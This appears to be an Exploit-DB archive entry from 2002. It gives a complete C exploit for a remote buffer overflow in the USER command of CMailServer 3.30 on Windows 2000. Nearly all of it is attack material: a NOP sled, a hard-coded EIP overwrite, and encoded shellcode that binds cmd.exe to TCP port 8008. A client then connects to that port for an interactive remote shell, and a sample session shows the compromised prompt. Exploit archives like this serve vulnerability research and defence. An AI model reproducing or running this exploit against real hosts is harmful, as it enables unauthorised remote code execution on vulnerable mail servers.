Youngzsoft CMailServer 3.30/4.0 - Remote Buffer Overflow (1)

EDB-ID:

21466


Author:

anonymous

Type:

remote


Platform:

Windows

Date:

2002-05-20


// source: https://www.securityfocus.com/bid/4789/info

CMailServer is vulnerable to a buffer overflow condition. It has been reported that the CMailServer does not perform proper bounds checking on the USER argument.

It is possible for a remote malicious attacker to craft a request that will result in code execution on the vulnerable system.

This issue has been reported in CMailServer 3.30. Other versions may also be affected. 

/*
        cmeexp.c
        May 20, 2002

        CMailServer 3.30 uses sprintf() without any previous
        bounds checking while testing for the presence of the 
        passed USER argument's home directory within 'mail'..

        sprintf(%s\\mail\\%s, CMail path ptr, USER arg ptr)

        you know how the story goes, we can overwrite some
        serious EIP action..

        USER <510 bytes><EIP>

        the payload is on the right as I didn't bother finding
        or making one fit on the left


	[xx@xxxx cmail]$ ./cmeexp the.man
	CMailServer 3.30 remote 'root' exploit (05/20/2002)
	2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com
	
	
	connecting...
	
	connected.. sending code
	
	code dumped..
	
	connecting to port 8008...
	success! izn0rw3ned!
	
	Microsoft Windows 2000 [Version 5.00.2195]
	(C) Copyright 1985-2000 Microsoft Corp.
	
	E:\Program Files\CMailServer>date
	The current date is: Mon 20/05/2002 
	Enter the new date: (dd-mm-yy)

*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>

/* Win2k SP2 + all hotfixes up until May 20th */
/* you've got one shot at this as cmail is    */
/* going down if you miss..                   */

/* this is the most consistant EIP hit on my  */
/* test machine although freshly booted she   */
/* tended to be "\x6d\xa7\xdb\x02"	      */

/* try in offsets of 0x100000 if you must..   */

#define EIP "\x6d\xa7\x0e\x03"

/* everything all rolled into one.. bind's cmd.exe  */
/* to port 8008.. this is a modified version of the */
/* shellcode created by |Zan's excellent generator  */

char shell[] =
"\x55\x53\x45\x52\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x83\xee\x7f\x83\xee\x7f\x83\xee\x7f\x83\xee\x7f"
"\x83\xee\x7f\x83\xee\x7f\x83\xee\x7f\x83\xee\x7f\x83\xee"
"\x7f\x83\xee\x4c\xff\xd6"EIP"\x55\x8b\xec\x68\x5e\x56\xc3"
"\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c\x90\x90\x90\x90"
"\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90\xac"
"\x34\x13\xaa\xe2\xfa\xfb\x13\x13\x13\x13\x4e\x92\xfe\xca"
"\x32\x53\x13\x9e\xa6\xe1\x37\x53\x13\x9e\xae\xe9\x37\x53"
"\x13\x79\x14\x83\x83\x83\x83\x4a\xfb\xc1\x11\x13\x13\x9e"
"\xa6\x39\x36\x53\x13\x9e\xae\x20\x36\x53\x13\x79\x19\x83"
"\x83\x83\x83\x4a\xfb\xa9\x11\x13\x13\x79\x13\x9e\xa6\xca"
"\x36\x53\x13\x45\x9e\xa6\xf6\x36\x53\x13\x45\x9e\xa6\xfa"
"\x36\x53\x13\x45\xec\x86\x20\x36\x53\x13\x79\x13\x9e\xa6"
"\xca\x36\x53\x13\x45\x9e\xa6\xfe\x36\x53\x13\x45\x9e\xa6"
"\xe2\x36\x53\x13\x45\xec\x86\x20\x36\x53\x13\xd4\x96\xe6"
"\x36\x53\x13\x57\x13\x13\x13\x9e\xa6\xe6\x36\x53\x13\x45"
"\xec\x86\x24\x36\x53\x13\x9e\xa6\x3e\x35\x53\x13\xbe\x43"
"\xec\x86\x40\x36\x53\x13\x9e\xa6\x22\x35\x53\x13\xbe\x43"
"\xec\x86\x40\x36\x53\x13\x9e\xa6\xe2\x36\x53\x13\x9e\xae"
"\x3e\x35\x53\x13\xb6\x9e\xa6\xf6\x36\x53\x13\xbe\x9e\xae"
"\x22\x35\x53\x13\xb8\x9e\xae\x26\x35\x53\x13\xb8\xd4\x96"
"\x36\x35\x53\x13\x13\x13\x13\x13\xd4\x96\x32\x35\x53\x13"
"\x12\x12\x13\x13\x9e\xa6\x2a\x35\x53\x13\x45\x9e\xa6\xe6"
"\x36\x53\x13\x45\x79\x13\x79\x13\x79\x03\x79\x12\x79\x13"
"\x79\x13\x9e\xa6\x5a\x35\x53\x13\x45\x79\x13\xec\x86\x28"
"\x36\x53\x13\x7b\x13\x33\x13\x13\x83\x7b\x13\x11\x13\x13"
"\xec\x86\x50\x36\x53\x13\x9a\x96\x42\x35\x53\x13\x20\xd3"
"\x43\x53\x43\x53\x43\xec\x86\xe9\x37\x53\x13\x43\x48\x79"
"\x03\x9e\xa6\xda\x36\x53\x13\x45\x40\xec\x86\xed\x37\x53"
"\x13\x79\x10\x40\xec\x86\x11\x36\x53\x13\x9e\xa6\x46\x35"
"\x53\x13\x45\x9e\xa6\xda\x36\x53\x13\x45\x40\xec\x86\x15"
"\x36\x53\x13\x9e\xae\x4a\x35\x53\x13\xb8\x20\xd3\x43\x9e"
"\xae\x76\x35\x53\x13\x44\x43\x43\x43\x9e\xa6\xfa\x36\x53"
"\x13\xbe\x43\xec\x86\x2c\x36\x53\x13\x79\x23\xec\x86\x5c"
"\x36\x53\x13\xf8\x5e\x83\x83\x83\x20\xd3\x43\x9e\xae\x76"
"\x35\x53\x13\x44\x43\x43\x43\x9e\xa6\xfa\x36\x53\x13\xbe"
"\x43\xec\x86\x2c\x36\x53\x13\x79\x43\xec\x86\x5c\x36\x53"
"\x13\x90\xae\x76\x35\x53\x13\x11\x1c\x91\x04\x12\x13\x13"
"\x92\xae\x76\x35\x53\x13\x12\x33\x13\x13\x61\x1d\x83\x83"
"\x83\x83\xd4\x96\x76\x35\x53\x13\x13\x33\x13\x13\x79\x13"
"\x98\x96\x76\x35\x53\x13\x9e\xae\x76\x35\x53\x13\x44\x43"
"\x98\x96\x42\x35\x53\x13\x43\x9e\xa6\xfa\x36\x53\x13\xbe"
"\x43\xec\x86\x54\x36\x53\x13\x79\x43\xec\x86\x5c\x36\x53"
"\x13\x98\x96\x76\x35\x53\x13\x79\x13\x43\x9e\xa6\x42\x35"
"\x53\x13\xbe\x43\x9e\xa6\x4a\x35\x53\x13\xbe\x43\xec\x86"
"\x19\x36\x53\x13\x79\x13\x9e\xae\x76\x35\x53\x13\x44\x79"
"\x13\x79\x13\x79\x13\x9e\xa6\xfa\x36\x53\x13\xbe\x43\xec"
"\x86\x2c\x36\x53\x13\x79\x43\xec\x86\x5c\x36\x53\x13\x20"
"\xda\x2a\x9e\x76\x35\x53\x13\x1c\x94\x74\xec\xec\xec\x79"
"\x13\x7b\x13\x33\x13\x13\x83\x9e\xa6\x42\x35\x53\x13\xbe"
"\x43\x9e\xa6\x4a\x35\x53\x13\xbe\x43\xec\x86\x1d\x36\x53"
"\x13\x9a\x96\x72\x35\x53\x13\x79\x13\x9e\xae\x76\x35\x53"
"\x13\x44\x43\x9e\xa6\x42\x35\x53\x13\xbe\x43\x9e\xa6\xfe"
"\x36\x53\x13\xbe\x43\xec\x86\x58\x36\x53\x13\x79\x43\xec"
"\x86\x5c\x36\x53\x13\x79\x13\x98\x96\x72\x35\x53\x13\x9e"
"\xae\x76\x35\x53\x13\x44\x43\x98\x96\x42\x35\x53\x13\x43"
"\x9e\xa6\xfa\x36\x53\x13\xbe\x43\xec\x86\x54\x36\x53\x13"
"\x79\x43\xec\x86\x5c\x36\x53\x13\xfa\xaa\xed\xec\xec\x9e"
"\xa6\x4a\x35\x53\x13\xbe\x43\xec\x86\x01\x36\x53\x13\x9e"
"\xa6\x4e\x35\x53\x13\xbe\x43\xec\x86\x01\x36\x53\x13\x79"
"\x13\xec\x86\x44\x36\x53\x13\x42\x45\x7b\xd3\xf1\x56\x13"
"\x83\x49\xec\x01\x43\x48\x4a\x44\x4d\x42\x45\x40\x7b\xd7"
"\xf1\x56\x13\x83\x49\xec\x01\x43\xbf\x97\xd3\x66\xe8\x4b"
"\xb8\x4a\xf1\xfa\xd0\x44\x40\x5c\x50\x58\x20\x21\x13\x60"
"\x7c\x70\x78\x76\x67\x13\x71\x7a\x7d\x77\x13\x7f\x7a\x60"
"\x67\x76\x7d\x13\x72\x70\x70\x76\x63\x67\x13\x60\x76\x7d"
"\x77\x13\x61\x76\x70\x65\x13\x70\x7f\x7c\x60\x76\x60\x7c"
"\x70\x78\x76\x67\x13\x58\x56\x41\x5d\x56\x5f\x20\x21\x13"
"\x50\x61\x76\x72\x67\x76\x43\x7a\x63\x76\x13\x54\x76\x67"
"\x40\x67\x72\x61\x67\x66\x63\x5a\x7d\x75\x7c\x52\x13\x50"
"\x61\x76\x72\x67\x76\x43\x61\x7c\x70\x76\x60\x60\x52\x13"
"\x43\x76\x76\x78\x5d\x72\x7e\x76\x77\x43\x7a\x63\x76\x13"
"\x54\x7f\x7c\x71\x72\x7f\x52\x7f\x7f\x7c\x70\x13\x41\x76"
"\x72\x77\x55\x7a\x7f\x76\x13\x44\x61\x7a\x67\x76\x55\x7a"
"\x7f\x76\x13\x40\x7f\x76\x76\x63\x13\x50\x7f\x7c\x60\x76"
"\x5b\x72\x7d\x77\x7f\x76\x13\x56\x6b\x7a\x67\x43\x61\x7c"
"\x70\x76\x60\x60\x13\x50\x7c\x77\x76\x77\x33\x71\x6a\x33"
"\x6f\x49\x72\x7d\x33\x2f\x7a\x69\x72\x7d\x53\x77\x76\x76"
"\x63\x69\x7c\x7d\x76\x3d\x7c\x61\x74\x2d\x11\x13\x0c\x5b"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x1f\x13"
"\x13\x13\x13\x13\x13\x13\x12\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x50\x5e"
"\x57\x3d\x56\x4b\x56\x13\x13\x13\x13\x13\x03\x13\x13\x13"
"\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13\x13"
"\x13\x13\x1a\x1a\x1a\x1a\x1a\x90\x90\x90\x0d\x0a";

main(char argc, char **argv){
        int fd;
        int bufsize = 1024;
        int buffer = malloc(bufsize);
        struct sockaddr_in sin;
        struct hostent *he;
        struct in_addr in;

        printf("CMailServer 3.30 remote 'root' exploit (05/20/2002)\n");
        printf("2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com\n\n\n");

        if (argc < 2){
                printf("Usage: <hostname>\n");
                exit(-1);
        }

        if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}

        if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);}
        else
        if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve host");exit(-1);}

        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr(inet_ntoa(in));
        sin.sin_port = htons(110);
 
        printf("connecting...\n");
        if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror("connection error");exit(-1);}
 
        printf("\nconnected.. sending code\n\n");
        if(write(fd, shell, strlen(shell)) < strlen(shell)){perror("write error");exit(-1);}
        printf("code dumped..\n\n");

        close(fd);

        if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}

        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr(argv[1]);
        sin.sin_port = htons(8008);

        printf("connecting to tcp port 8008...\n");
        sleep(1);
        if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){printf("exploit failed.. adjust EIP?\n\n");exit(-1);}
        printf("success! izn0rw3ned!\n\n");

        while(1) {
                fd_set input;

                FD_SET(0,&input);
                FD_SET(fd,&input);
                if((select(fd+1,&input,NULL,NULL,NULL))<0) {
                        if(errno==EINTR) continue;
                        printf("connection reset\n"); fflush(stdout);
                        exit(1);
                }
                if(FD_ISSET(fd,&input))
                        write(1,buffer,read(fd,buffer,bufsize));
                if(FD_ISSET(0,&input))
                        write(fd,buffer,read(0,buffer,bufsize));
        }

        close(fd);

}